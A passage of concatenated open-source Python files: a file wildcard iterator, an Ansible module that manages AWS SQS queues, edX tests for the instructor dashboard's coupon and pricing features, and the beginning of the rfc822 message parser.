        yield bucket_listing_ref.GetKey()

  def IterUris(self):
    """
    Convenience iterator that runs underlying iterator and returns StorageUri
    for each iteration.

    Yields:
      StorageUri, or empty iterator if no matches.
    """
    for bucket_listing_ref in iter(self):
      yield bucket_listing_ref.GetUri()

  def IterUrisForKeys(self):
    """
    Convenience iterator that runs underlying iterator and returns the
    StorageUri for each iterated BucketListingRef that has a Key.

    Yields:
      StorageUri, or empty iterator if no matches.
    """
    for bucket_listing_ref in iter(self):
      if bucket_listing_ref.HasKey():
        yield bucket_listing_ref.GetUri()
class FileWildcardIterator(WildcardIterator):
  """WildcardIterator subclass for files and directories.

  If you use recursive wildcards ('**') only a single such wildcard is
  supported. For example you could use the wildcard '**/*.txt' to list all .txt
  files in any subdirectory of the current directory, but you couldn't use a
  wildcard like '**/abc/**/*.txt' (which would, if supported, let you find .txt
  files in any subdirectory named 'abc').
  """

  def __init__(self, wildcard_uri, headers=None, debug=0):
    """
    Instantiate an iterator over BucketListingRefs matching given wildcard URI.

    Args:
      wildcard_uri: StorageUri that contains the wildcard to iterate.
      headers: Dictionary containing optional HTTP headers to pass to boto.
      debug: Debug level to pass in to boto connection (range 0..3).
    """
    self.wildcard_uri = wildcard_uri
    self.headers = headers
    self.debug = debug

  def __iter__(self):
    """Yields a BucketListingRef for each file path matching the wildcard."""
    wildcard = self.wildcard_uri.object_name
    # Raw string: the original '\*\*' pattern relied on invalid escape
    # sequences, which newer Python versions warn about.
    match = re.search(r'\*\*', wildcard)
    if match:
      # Recursive wildcarding request ('.../**/...').
      # Example input: wildcard = '/tmp/tmp2pQJAX/**/*'
      base_dir = wildcard[:match.start()-1]
      remaining_wildcard = wildcard[match.start()+2:]
      # At this point for the above example base_dir = '/tmp/tmp2pQJAX' and
      # remaining_wildcard = '/*'
      if remaining_wildcard.startswith('*'):
        raise WildcardException('Invalid wildcard with more than 2 consecutive '
                                '*s (%s)' % wildcard)
      # If there was no remaining wildcard past the recursive wildcard,
      # treat it as if it were a '*'. For example, file://tmp/** is equivalent
      # to file://tmp/**/*
      if not remaining_wildcard:
        remaining_wildcard = '*'
      # Skip slash(es).
      remaining_wildcard = remaining_wildcard.lstrip(os.sep)
      filepaths = []
      for dirpath, unused_dirnames, filenames in os.walk(base_dir):
        filepaths.extend(
            os.path.join(dirpath, f) for f in fnmatch.filter(filenames,
                                                             remaining_wildcard)
        )
    else:
      # Not a recursive wildcarding request.
      filepaths = glob.glob(wildcard)
    for filepath in filepaths:
      expanded_uri = self.wildcard_uri.clone_replace_name(filepath)
      yield BucketListingRef(expanded_uri)

  def IterKeys(self):
    """
    Placeholder to allow polymorphic use of WildcardIterator.

    Raises:
      WildcardException: in all cases.
    """
    raise WildcardException(
        'Iterating over Keys not possible for file wildcards')

  def IterUris(self):
    """
    Convenience iterator that runs underlying iterator and returns StorageUri
    for each iteration.

    Yields:
      StorageUri, or empty iterator if no matches.
    """
    for bucket_listing_ref in iter(self):
      yield bucket_listing_ref.GetUri()
class WildcardException(StandardError):
  """Exception thrown for invalid wildcard URIs."""

  def __init__(self, reason):
    # reason: human-readable explanation of why the wildcard URI is invalid;
    # surfaced via both __repr__ and __str__ below.
    StandardError.__init__(self)
    self.reason = reason

  def __repr__(self):
    return 'WildcardException: %s' % self.reason

  def __str__(self):
    return 'WildcardException: %s' % self.reason
def wildcard_iterator(uri_or_str, proj_id_handler,
                      bucket_storage_uri_class=BucketStorageUri,
                      all_versions=False,
                      headers=None, debug=0):
  """Instantiate a WildCardIterator for the given StorageUri.

  Args:
    uri_or_str: StorageUri or URI string naming wildcard objects to iterate.
    proj_id_handler: ProjectIdHandler to use for current command.
    bucket_storage_uri_class: BucketStorageUri interface.
        Settable for testing/mocking.
    all_versions: If True, cloud iteration includes all object versions.
    headers: Dictionary containing optional HTTP headers to pass to boto.
    debug: Debug level to pass in to boto connection (range 0..3).

  Returns:
    A WildcardIterator that handles the requested iteration.

  Raises:
    WildcardException: if the URI is neither a cloud nor a file URI.
  """
  if isinstance(uri_or_str, basestring):
    # validate=False disables bucket name checking, allowing bucket names
    # that contain wildcard characters.
    uri = boto.storage_uri(
        uri_or_str, debug=debug, validate=False,
        bucket_storage_uri_class=bucket_storage_uri_class,
        suppress_consec_slashes=False)
  else:
    uri = uri_or_str

  if uri.is_cloud_uri():
    return CloudWildcardIterator(
        uri, proj_id_handler,
        bucket_storage_uri_class=bucket_storage_uri_class,
        all_versions=all_versions,
        headers=headers,
        debug=debug)
  if uri.is_file_uri():
    return FileWildcardIterator(uri, headers=headers, debug=debug)
  raise WildcardException('Unexpected type of StorageUri (%s)' % uri)
def ContainsWildcard(uri_or_str):
  """Checks whether uri_or_str contains a wildcard.

  Args:
    uri_or_str: StorageUri or URI string to check.

  Returns:
    bool indicator.
  """
  # Accept either a plain URI string or a StorageUri-like object; for the
  # latter, inspect its .uri attribute.
  text = uri_or_str if isinstance(uri_or_str, basestring) else uri_or_str.uri
  return WILDCARD_REGEX.search(text) is not None
| bsd-3-clause |
trondhindenes/ansible-modules-extras | cloud/amazon/sqs_queue.py | 30 | 7858 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# NOTE: DOCUMENTATION and EXAMPLES are runtime values consumed by Ansible's
# doc tooling (e.g. ansible-doc); their contents must remain valid YAML and
# must not be reformatted.
DOCUMENTATION = """
---
module: sqs_queue
short_description: Creates or deletes AWS SQS queues.
description:
- Create or delete AWS SQS queues.
- Update attributes on existing queues.
version_added: "2.0"
author:
- Alan Loi (@loia)
- Fernando Jose Pando (@nand0p)
requirements:
- "boto >= 2.33.0"
options:
state:
description:
- Create or delete the queue
required: false
choices: ['present', 'absent']
default: 'present'
name:
description:
- Name of the queue.
required: true
default_visibility_timeout:
description:
- The default visibility timeout in seconds.
required: false
default: null
message_retention_period:
description:
- The message retention period in seconds.
required: false
default: null
maximum_message_size:
description:
- The maximum message size in bytes.
required: false
default: null
delivery_delay:
description:
- The delivery delay in seconds.
required: false
default: null
receive_message_wait_time:
description:
- The receive message wait time in seconds.
required: false
default: null
policy:
description:
- The json dict policy to attach to queue
required: false
default: null
version_added: "2.1"
extends_documentation_fragment:
- aws
- ec2
"""

# Usage examples shown by ansible-doc; also valid YAML.
EXAMPLES = '''
# Create SQS queue
- sqs_queue:
name: my-queue
region: ap-southeast-2
default_visibility_timeout: 120
message_retention_period: 86400
maximum_message_size: 1024
delivery_delay: 30
receive_message_wait_time: 20
policy: "{{ json_dict }}"
# Delete SQS queue
- sqs_queue:
name: my-queue
region: ap-southeast-2
state: absent
'''
# boto is an optional dependency: record its availability so main() can emit
# a clean fail_json message instead of an unhandled ImportError traceback.
try:
    import boto.sqs
    from boto.exception import BotoServerError, NoAuthHandlerFound
    HAS_BOTO = True
except ImportError:
    HAS_BOTO = False
def create_or_update_sqs_queue(connection, module):
    """Ensure the named SQS queue exists and carries the requested attributes.

    Exits the module via exit_json on success (with a 'changed' flag) or
    fail_json on a boto server error.
    """
    name = module.params.get('name')

    # Attribute keys deliberately mirror update_sqs_queue()'s keyword
    # parameter names so the dict can be splatted straight into it.
    attributes = {}
    for attr_name in ('default_visibility_timeout', 'message_retention_period',
                      'maximum_message_size', 'delivery_delay',
                      'receive_message_wait_time', 'policy'):
        attributes[attr_name] = module.params.get(attr_name)

    result = dict(region=module.params.get('region'), name=name)
    result.update(attributes)

    try:
        queue = connection.get_queue(name)
        if queue:
            # Queue already exists -- reconcile its attributes.
            result['changed'] = update_sqs_queue(queue, check_mode=module.check_mode, **attributes)
        else:
            # Queue is missing -- create it (unless in check mode).
            if not module.check_mode:
                queue = connection.create_queue(name)
                update_sqs_queue(queue, **attributes)
            result['changed'] = True
    except BotoServerError:
        result['msg'] = 'Failed to create/update sqs queue due to error: ' + traceback.format_exc()
        module.fail_json(**result)
    else:
        module.exit_json(**result)
def update_sqs_queue(queue,
                     check_mode=False,
                     default_visibility_timeout=None,
                     message_retention_period=None,
                     maximum_message_size=None,
                     delivery_delay=None,
                     receive_message_wait_time=None,
                     policy=None):
    """Apply each requested attribute to the queue.

    Returns True if any attribute was (or, in check mode, would be) changed.
    """
    updates = (
        ('VisibilityTimeout', default_visibility_timeout),
        ('MessageRetentionPeriod', message_retention_period),
        ('MaximumMessageSize', maximum_message_size),
        ('DelaySeconds', delivery_delay),
        ('ReceiveMessageWaitTimeSeconds', receive_message_wait_time),
        ('Policy', policy),
    )
    changed = False
    # Evaluate every attribute -- no short-circuiting -- so all requested
    # updates are applied even after the first change is detected.
    for attribute, value in updates:
        if set_queue_attribute(queue, attribute, value, check_mode=check_mode):
            changed = True
    return changed
def set_queue_attribute(queue, attribute, value, check_mode=False):
    """Set a single SQS queue attribute if it differs from the current value.

    Args:
        queue: boto SQS queue object.
        attribute: SQS attribute name, e.g. 'VisibilityTimeout' or 'Policy'.
        value: Desired value; falsy values mean "leave unchanged".
        check_mode: If True, report whether a change would occur without
            applying it.

    Returns:
        bool: True if the attribute was (or would be) changed.
    """
    if not value:
        return False

    try:
        existing_value = queue.get_attributes(attributes=attribute)[attribute]
    except Exception:  # narrowed from a bare except: attribute may be unset
        existing_value = ''

    # convert dict attributes to JSON strings (sort keys for comparing)
    if attribute == 'Policy':  # was "is 'Policy'": identity check on a string
        value = json.dumps(value, sort_keys=True)
        if existing_value:
            existing_value = json.dumps(json.loads(existing_value), sort_keys=True)

    if str(value) != existing_value:
        if not check_mode:
            queue.set_attribute(attribute, value)
        return True

    return False
def delete_sqs_queue(connection, module):
    """Delete the named SQS queue if it exists.

    Exits the module via exit_json (with a 'changed' flag) on success, or
    fail_json on a boto server error.
    """
    name = module.params.get('name')
    result = dict(region=module.params.get('region'), name=name)

    try:
        queue = connection.get_queue(name)
        if not queue:
            # Nothing to delete.
            result['changed'] = False
        else:
            if not module.check_mode:
                connection.delete_queue(queue)
            # Set only after the delete succeeds, so a failure report does
            # not claim a change was made.
            result['changed'] = True
    except BotoServerError:
        result['msg'] = 'Failed to delete sqs queue due to error: ' + traceback.format_exc()
        module.fail_json(**result)
    else:
        module.exit_json(**result)
def main():
    """Module entry point: parse arguments, connect to SQS, dispatch on state."""
    argument_spec = ec2_argument_spec()
    argument_spec.update(dict(
        state=dict(default='present', choices=['present', 'absent']),
        name=dict(required=True, type='str'),
        default_visibility_timeout=dict(type='int'),
        message_retention_period=dict(type='int'),
        maximum_message_size=dict(type='int'),
        delivery_delay=dict(type='int'),
        receive_message_wait_time=dict(type='int'),
        policy=dict(type='dict', required=False),
    ))

    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True)

    if not HAS_BOTO:
        module.fail_json(msg='boto required for this module')

    region, ec2_url, aws_connect_params = get_aws_connection_info(module)
    if not region:
        module.fail_json(msg='region must be specified')

    # 'as e' replaces the Python-2-only 'except (...), e' syntax, which is a
    # parse error on Python 3; the 'as' form works on Python 2.6+ as well.
    try:
        connection = connect_to_aws(boto.sqs, region, **aws_connect_params)
    except (NoAuthHandlerFound, AnsibleAWSError) as e:
        module.fail_json(msg=str(e))

    state = module.params.get('state')
    if state == 'present':
        create_or_update_sqs_queue(connection, module)
    elif state == 'absent':
        delete_sqs_queue(connection, module)
# import module snippets
# NOTE(review): Ansible convention places these wildcard imports at the bottom;
# they supply AnsibleModule and the ec2_* helpers, and presumably also bring
# `traceback` into scope for the handlers above -- verify against
# ansible.module_utils.basic.
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *

if __name__ == '__main__':
    main()
| gpl-3.0 |
mahendra-r/edx-platform | lms/djangoapps/instructor/tests/test_ecommerce.py | 44 | 14997 | """
Unit tests for Ecommerce feature flag in new instructor dashboard.
"""
import datetime
import pytz
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr
from course_modes.models import CourseMode
from student.roles import CourseFinanceAdminRole
from shoppingcart.models import Coupon, CourseRegistrationCode
from student.tests.factories import AdminFactory
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
@attr('shard_1')
class TestECommerceDashboardViews(SharedModuleStoreTestCase):
"""
Check for E-commerce view on the new instructor dashboard
"""
@classmethod
def setUpClass(cls):
super(TestECommerceDashboardViews, cls).setUpClass()
cls.course = CourseFactory.create()
# URL for instructor dash
cls.url = reverse('instructor_dashboard', kwargs={'course_id': cls.course.id.to_deprecated_string()})
cls.e_commerce_link = '<a href="" data-section="e-commerce">E-Commerce</a>'
def setUp(self):
super(TestECommerceDashboardViews, self).setUp()
# Create instructor account
self.instructor = AdminFactory.create()
self.client.login(username=self.instructor.username, password="test")
mode = CourseMode(
course_id=self.course.id.to_deprecated_string(), mode_slug='honor',
mode_display_name='honor', min_price=10, currency='usd'
)
mode.save()
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
def test_pass_e_commerce_tab_in_instructor_dashboard(self):
"""
Test Pass E-commerce Tab is in the Instructor Dashboard
"""
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Coupons should show up for White Label sites with priced honor modes.
self.assertTrue('Coupon Code List' in response.content)
def test_user_has_finance_admin_rights_in_e_commerce_tab(self):
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Order/Invoice sales csv button text should render in e-commerce page
self.assertTrue('Total Credit Card Purchases' in response.content)
self.assertTrue('Download All Credit Card Purchases' in response.content)
self.assertTrue('Download All Invoices' in response.content)
# removing the course finance_admin role of login user
CourseFinanceAdminRole(self.course.id).remove_users(self.instructor)
# Order/Invoice sales csv button text should not be visible in e-commerce page if the user is not finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(url)
self.assertFalse('Download All Invoices' in response.content)
def test_user_view_course_price(self):
"""
test to check if the user views the set price button and price in
the instructor dashboard
"""
response = self.client.get(self.url)
self.assertTrue(self.e_commerce_link in response.content)
# Total amount html should render in e-commerce page, total amount will be 0
course_honor_mode = CourseMode.mode_for_course(self.course.id, 'honor')
price = course_honor_mode.min_price
self.assertTrue('Course price per seat: <span>$' + str(price) + '</span>' in response.content)
self.assertFalse('+ Set Price</a></span>' in response.content)
# removing the course finance_admin role of login user
CourseFinanceAdminRole(self.course.id).remove_users(self.instructor)
# total amount should not be visible in e-commerce page if the user is not finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.get(url)
self.assertFalse('+ Set Price</a></span>' in response.content)
def test_update_course_price_check(self):
price = 200
# course B
course2 = CourseFactory.create(org='EDX', display_name='test_course', number='100')
mode = CourseMode(
course_id=course2.id.to_deprecated_string(), mode_slug='honor',
mode_display_name='honor', min_price=30, currency='usd'
)
mode.save()
# course A update
CourseMode.objects.filter(course_id=self.course.id).update(min_price=price)
set_course_price_url = reverse('set_course_mode_price', kwargs={'course_id': self.course.id.to_deprecated_string()})
data = {'course_price': price, 'currency': 'usd'}
response = self.client.post(set_course_price_url, data)
self.assertTrue('CourseMode price updated successfully' in response.content)
# Course A updated total amount should be visible in e-commerce page if the user is finance admin
url = reverse('instructor_dashboard', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.get(url)
self.assertTrue('Course price per seat: <span>$' + str(price) + '</span>' in response.content)
def test_user_admin_set_course_price(self):
"""
test to set the course price related functionality.
test al the scenarios for setting a new course price
"""
set_course_price_url = reverse('set_course_mode_price', kwargs={'course_id': self.course.id.to_deprecated_string()})
data = {'course_price': '12%', 'currency': 'usd'}
# Value Error course price should be a numeric value
response = self.client.post(set_course_price_url, data)
self.assertTrue("Please Enter the numeric value for the course price" in response.content)
# validation check passes and course price is successfully added
data['course_price'] = 100
response = self.client.post(set_course_price_url, data)
self.assertTrue("CourseMode price updated successfully" in response.content)
course_honor_mode = CourseMode.objects.get(mode_slug='honor')
course_honor_mode.delete()
# Course Mode not exist with mode slug honor
response = self.client.post(set_course_price_url, data)
self.assertTrue("CourseMode with the mode slug({mode_slug}) DoesNotExist".format(mode_slug='honor') in response.content)
def test_add_coupon(self):
"""
Test Add Coupon Scenarios. Handle all the HttpResponses return by add_coupon view
"""
# URL for add_coupon
add_coupon_url = reverse('add_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})
expiration_date = datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=2)
data = {
'code': 'A2314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'ADSADASDSAD', 'created_by': self.instructor, 'discount': 5,
'expiration_date': '{month}/{day}/{year}'.format(month=expiration_date.month, day=expiration_date.day, year=expiration_date.year)
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("coupon with the coupon code ({code}) added successfully".format(code=data['code']) in response.content)
#now add the coupon with the wrong value in the expiration_date
# server will through the ValueError Exception in the expiration_date field
data = {
'code': '213454', 'course_id': self.course.id.to_deprecated_string(),
'description': 'ADSADASDSAD', 'created_by': self.instructor, 'discount': 5,
'expiration_date': expiration_date.strftime('"%d/%m/%Y')
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("Please enter the date in this format i-e month/day/year" in response.content)
data = {
'code': 'A2314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'asdsasda', 'created_by': self.instructor, 'discount': 99
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("coupon with the coupon code ({code}) already exist".format(code='A2314') in response.content)
response = self.client.post(self.url)
self.assertTrue('<td>ADSADASDSAD</td>' in response.content)
self.assertTrue('<td>A2314</td>' in response.content)
self.assertFalse('<td>111</td>' in response.content)
data = {
'code': 'A2345314', 'course_id': self.course.id.to_deprecated_string(),
'description': 'asdsasda', 'created_by': self.instructor, 'discount': 199
}
response = self.client.post(add_coupon_url, data)
self.assertTrue("Please Enter the Coupon Discount Value Less than or Equal to 100" in response.content)
data['discount'] = '25%'
response = self.client.post(add_coupon_url, data=data)
self.assertTrue('Please Enter the Integer Value for Coupon Discount' in response.content)
course_registration = CourseRegistrationCode(
code='Vs23Ws4j', course_id=unicode(self.course.id), created_by=self.instructor,
mode_slug='honor'
)
course_registration.save()
data['code'] = 'Vs23Ws4j'
response = self.client.post(add_coupon_url, data)
self.assertTrue("The code ({code}) that you have tried to define is already in use as a registration code"
.format(code=data['code']) in response.content)
def test_delete_coupon(self):
"""
Test Delete Coupon Scenarios. Handle all the HttpResponses return by remove_coupon view
"""
coupon = Coupon(
code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
percentage_discount=10, created_by=self.instructor
)
coupon.save()
response = self.client.post(self.url)
self.assertTrue('<td>AS452</td>' in response.content)
# URL for remove_coupon
delete_coupon_url = reverse('remove_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(delete_coupon_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) updated successfully'.format(coupon_id=coupon.id) in response.content)
coupon.is_active = False
coupon.save()
response = self.client.post(delete_coupon_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) is already inactive'.format(coupon_id=coupon.id) in response.content)
response = self.client.post(delete_coupon_url, {'id': 24454})
self.assertTrue('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=24454) in response.content)
response = self.client.post(delete_coupon_url, {'id': ''})
self.assertTrue('coupon id is None' in response.content)
def test_get_coupon_info(self):
"""
Test Edit Coupon Info Scenarios. Handle all the HttpResponses return by edit_coupon_info view
"""
coupon = Coupon(
code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
percentage_discount=10, created_by=self.instructor,
expiration_date=datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=2)
)
coupon.save()
# URL for edit_coupon_info
edit_url = reverse('get_coupon_info', kwargs={'course_id': self.course.id.to_deprecated_string()})
response = self.client.post(edit_url, {'id': coupon.id})
self.assertTrue('coupon with the coupon id ({coupon_id}) updated successfully'.format(coupon_id=coupon.id) in response.content)
self.assertIn(coupon.display_expiry_date, response.content)
response = self.client.post(edit_url, {'id': 444444})
self.assertTrue('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=444444) in response.content)
response = self.client.post(edit_url, {'id': ''})
self.assertTrue('coupon id not found"' in response.content)
coupon.is_active = False
coupon.save()
response = self.client.post(edit_url, {'id': coupon.id})
self.assertTrue("coupon with the coupon id ({coupon_id}) is already inactive".format(coupon_id=coupon.id) in response.content)
def test_update_coupon(self):
    """
    Test Update Coupon Info Scenarios. Handle all the HttpResponses return by update_coupon view
    """
    coupon = Coupon(
        code='AS452', description='asdsadsa', course_id=self.course.id.to_deprecated_string(),
        percentage_discount=10, created_by=self.instructor
    )
    coupon.save()
    # Sanity check: the coupon code is listed on the instructor dashboard.
    response = self.client.post(self.url)
    self.assertIn('<td>AS452</td>', response.content)
    data = {
        'coupon_id': coupon.id, 'code': 'AS452', 'discount': '10', 'description': 'updated_description',  # pylint: disable=no-member
        'course_id': coupon.course_id.to_deprecated_string()
    }
    # URL for update_coupon
    update_coupon_url = reverse('update_coupon', kwargs={'course_id': self.course.id.to_deprecated_string()})

    # A valid update succeeds and the new description shows on the dashboard.
    # assertIn gives a useful diff on failure, unlike assertTrue(x in y).
    response = self.client.post(update_coupon_url, data=data)
    self.assertIn('coupon with the coupon id ({coupon_id}) updated Successfully'.format(coupon_id=coupon.id), response.content)
    response = self.client.post(self.url)
    self.assertIn('<td>updated_description</td>', response.content)

    data['coupon_id'] = 1000  # Coupon Not Exist with this ID
    response = self.client.post(update_coupon_url, data=data)
    self.assertIn('coupon with the coupon id ({coupon_id}) DoesNotExist'.format(coupon_id=1000), response.content)

    data['coupon_id'] = ''  # Coupon id is not provided
    response = self.client.post(update_coupon_url, data=data)
    self.assertIn('coupon id not found', response.content)
def test_verified_course(self):
    """Verify the e-commerce panel shows up for verified courses as well, without Coupons """
    # Change honor mode to verified.
    original_mode = CourseMode.objects.get(course_id=self.course.id, mode_slug='honor')
    original_mode.delete()
    new_mode = CourseMode(
        course_id=unicode(self.course.id), mode_slug='verified',
        mode_display_name='verified', min_price=10, currency='usd'
    )
    new_mode.save()

    # Get the response value, ensure the Coupon section is not included.
    # assertIn/assertNotIn give useful diffs on failure, unlike
    # assertTrue/assertFalse over a containment expression.
    response = self.client.get(self.url)
    self.assertIn(self.e_commerce_link, response.content)
    # Coupons should show up for White Label sites with priced honor modes.
    self.assertNotIn('Coupons List', response.content)
| agpl-3.0 |
uwafsl/MissionPlanner | Lib/rfc822.py | 58 | 34306 | """RFC 2822 message manipulation.
Note: This is only a very rough sketch of a full RFC-822 parser; in particular
the tokenizing of addresses does not adhere to all the quoting rules.
Note: RFC 2822 is a long awaited update to RFC 822. This module should
conform to RFC 2822, and is thus mis-named (it's not worth renaming it). Some
effort at RFC 2822 updates have been made, but a thorough audit has not been
performed. Consider any RFC 2822 non-conformance to be a bug.
RFC 2822: http://www.faqs.org/rfcs/rfc2822.html
RFC 822 : http://www.faqs.org/rfcs/rfc822.html (obsolete)
Directions for use:
To create a Message object: first open a file, e.g.:
fp = open(file, 'r')
You can use any other legal way of getting an open file object, e.g. use
sys.stdin or call os.popen(). Then pass the open file object to the Message()
constructor:
m = Message(fp)
This class can work with any input object that supports a readline method. If
the input object has seek and tell capability, the rewindbody method will
work; also illegal lines will be pushed back onto the input stream. If the
input object lacks seek but has an `unread' method that can push back a line
of input, Message will use that to push back illegal lines. Thus this class
can be used to parse messages coming from a buffered stream.
The optional `seekable' argument is provided as a workaround for certain stdio
libraries in which tell() discards buffered data before discovering that the
lseek() system call doesn't work. For maximum portability, you should set the
seekable argument to zero to prevent that initial \code{tell} when passing in
an unseekable object such as a file object created from a socket object. If
it is 1 on entry -- which it is by default -- the tell() method of the open
file object is called once; if this raises an exception, seekable is reset to
0. For other nonzero values of seekable, this test is not made.
To get the text of a particular header there are several methods:
str = m.getheader(name)
str = m.getrawheader(name)
where name is the name of the header, e.g. 'Subject'. The difference is that
getheader() strips the leading and trailing whitespace, while getrawheader()
doesn't. Both functions retain embedded whitespace (including newlines)
exactly as they are specified in the header, and leave the case of the text
unchanged.
For addresses and address lists there are functions
realname, mailaddress = m.getaddr(name)
list = m.getaddrlist(name)
where the latter returns a list of (realname, mailaddr) tuples.
There is also a method
time = m.getdate(name)
which parses a Date-like field and returns a time-compatible tuple,
i.e. a tuple such as returned by time.localtime() or accepted by
time.mktime().
See the class definition for lower level access methods.
There are also some utility functions here.
"""
# Cleanup and extensions by Eric S. Raymond <esr@thyrsus.com>

import time

from warnings import warnpy3k
# Emit the Py3k deprecation warning at import time: this module was removed
# in Python 3 in favor of the email package.
warnpy3k("in 3.x, rfc822 has been removed in favor of the email package",
         stacklevel=2)

__all__ = ["Message","AddressList","parsedate","parsedate_tz","mktime_tz"]

_blanklines = ('\r\n', '\n')    # Optimization for islast()
class Message:
    """Represents a single RFC 2822-compliant message."""

    def __init__(self, fp, seekable = 1):
        """Initialize the class instance and read the headers."""
        if seekable == 1:
            # Exercise tell() to make sure it works
            # (and then assume seek() works, too)
            try:
                fp.tell()
            except (AttributeError, IOError):
                seekable = 0
        self.fp = fp
        self.seekable = seekable
        self.startofheaders = None
        self.startofbody = None
        #
        if self.seekable:
            try:
                self.startofheaders = self.fp.tell()
            except IOError:
                self.seekable = 0
        #
        self.readheaders()
        #
        if self.seekable:
            try:
                self.startofbody = self.fp.tell()
            except IOError:
                self.seekable = 0

    def rewindbody(self):
        """Rewind the file to the start of the body (if seekable)."""
        if not self.seekable:
            raise IOError, "unseekable file"
        self.fp.seek(self.startofbody)

    def readheaders(self):
        """Read header lines.

        Read header lines up to the entirely blank line that terminates them.
        The (normally blank) line that ends the headers is skipped, but not
        included in the returned list.  If a non-header line ends the headers,
        (which is an error), an attempt is made to backspace over it; it is
        never included in the returned list.

        The variable self.status is set to the empty string if all went well,
        otherwise it is an error message.  The variable self.headers is a
        completely uninterpreted list of lines contained in the header (so
        printing them will reproduce the header exactly as it appears in the
        file).
        """
        # self.dict maps lowercased header names to their stripped value
        # (last occurrence wins); self.headers keeps raw lines verbatim.
        self.dict = {}
        self.unixfrom = ''
        self.headers = lst = []
        self.status = ''
        headerseen = ""
        firstline = 1
        startofline = unread = tell = None
        # Prefer a pushback method if the stream has one, else fall back to
        # tell()/seek() so a non-header line can be "un-read".
        if hasattr(self.fp, 'unread'):
            unread = self.fp.unread
        elif self.seekable:
            tell = self.fp.tell
        while 1:
            if tell:
                try:
                    startofline = tell()
                except IOError:
                    startofline = tell = None
                    self.seekable = 0
            line = self.fp.readline()
            if not line:
                self.status = 'EOF in headers'
                break
            # Skip unix From name time lines
            if firstline and line.startswith('From '):
                self.unixfrom = self.unixfrom + line
                continue
            firstline = 0
            if headerseen and line[0] in ' \t':
                # It's a continuation line.
                lst.append(line)
                x = (self.dict[headerseen] + "\n " + line.strip())
                self.dict[headerseen] = x.strip()
                continue
            elif self.iscomment(line):
                # It's a comment.  Ignore it.
                continue
            elif self.islast(line):
                # Note! No pushback here!  The delimiter line gets eaten.
                break
            headerseen = self.isheader(line)
            if headerseen:
                # It's a legal header line, save it.
                lst.append(line)
                self.dict[headerseen] = line[len(headerseen)+1:].strip()
                continue
            else:
                # It's not a header line; throw it back and stop here.
                if not self.dict:
                    self.status = 'No headers'
                else:
                    self.status = 'Non-header line where header expected'
                # Try to undo the read.
                if unread:
                    unread(line)
                elif tell:
                    self.fp.seek(startofline)
                else:
                    self.status = self.status + '; bad seek'
                break

    def isheader(self, line):
        """Determine whether a given line is a legal header.

        This method should return the header name, suitably canonicalized.
        You may override this method in order to use Message parsing on tagged
        data in RFC 2822-like formats with special header formats.
        """
        i = line.find(':')
        if i > 0:
            # Canonical form is the lowercased name before the colon.
            return line[:i].lower()
        return None

    def islast(self, line):
        """Determine whether a line is a legal end of RFC 2822 headers.

        You may override this method if your application wants to bend the
        rules, e.g. to strip trailing whitespace, or to recognize MH template
        separators ('--------').  For convenience (e.g. for code reading from
        sockets) a line consisting of \r\n also matches.
        """
        return line in _blanklines

    def iscomment(self, line):
        """Determine whether a line should be skipped entirely.

        You may override this method in order to use Message parsing on tagged
        data in RFC 2822-like formats that support embedded comments or
        free-text data.
        """
        return False

    def getallmatchingheaders(self, name):
        """Find all header lines matching a given header name.

        Look through the list of headers and find all lines matching a given
        header name (and their continuation lines).  A list of the lines is
        returned, without interpretation.  If the header does not occur, an
        empty list is returned.  If the header occurs multiple times, all
        occurrences are returned.  Case is not important in the header name.
        """
        name = name.lower() + ':'
        n = len(name)
        lst = []
        hit = 0
        for line in self.headers:
            if line[:n].lower() == name:
                hit = 1
            elif not line[:1].isspace():
                # A non-continuation line ends the current match run.
                hit = 0
            if hit:
                lst.append(line)
        return lst

    def getfirstmatchingheader(self, name):
        """Get the first header line matching name.

        This is similar to getallmatchingheaders, but it returns only the
        first matching header (and its continuation lines).
        """
        name = name.lower() + ':'
        n = len(name)
        lst = []
        hit = 0
        for line in self.headers:
            if hit:
                if not line[:1].isspace():
                    break
            elif line[:n].lower() == name:
                hit = 1
            if hit:
                lst.append(line)
        return lst

    def getrawheader(self, name):
        """A higher-level interface to getfirstmatchingheader().

        Return a string containing the literal text of the header but with the
        keyword stripped.  All leading, trailing and embedded whitespace is
        kept in the string, however.  Return None if the header does not
        occur.
        """
        lst = self.getfirstmatchingheader(name)
        if not lst:
            return None
        lst[0] = lst[0][len(name) + 1:]
        return ''.join(lst)

    def getheader(self, name, default=None):
        """Get the header value for a name.

        This is the normal interface: it returns a stripped version of the
